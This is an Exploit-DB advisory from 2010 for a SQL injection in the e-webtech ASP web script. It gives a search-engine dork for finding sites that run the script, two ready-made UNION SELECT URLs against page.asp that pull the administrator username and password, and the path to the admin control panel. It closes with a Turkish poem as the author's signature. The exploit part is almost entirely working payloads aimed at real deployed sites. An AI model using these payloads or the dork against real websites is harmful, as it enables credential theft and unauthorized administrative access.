e-webtech page.asp SQL Injection Vulnerability

2010-05-11T00:00:00
ID EDB-ID:12571
Type exploitdb
Reporter CoBRa_21
Modified 2010-05-11T00:00:00

Description

e-webtech (page.asp) SQL Injection Vulnerability. Webapps exploit for asp platform

                                        
                                            -------------------------------------------------------------------------------------------
 
e-webtech (page.asp) SQL Injection Vulnerability
 
-------------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu@windowslive.com
 
Script Name: e-webtech
 
Dork: "Powerd by www.e-webtech.com"

-------------------------------------------------------------------------------------------
 
User Exploit:
 
http://localhost/[path]/page.asp?id=1+union+select+0,1,username+from+adminpassword
 
Password Exploit:

http://localhost/[path]/page.asp?id=1+union+select+0,1,pwd+from+adminpassword

Administartor Panel:

http://localhost/[path]/controlpanel/

-------------------------------------------------------------------------------------------

Öyle bir özlemişim ki seni
Artık dönsen de olur dönmesen de
Ben her daim yine sana sitemli yine sana hasret giderim
Aziz yar sen bir sabah bu şehri başıma yıkıp gittin
Dağları deviriverdin üstüme hiç çekinmedin
Ben bu şehirde bir daha da sabah görmedim
Günaydınlar olmadı günler aymadı sensiz ........

-------------------------------------------------------------------------------------------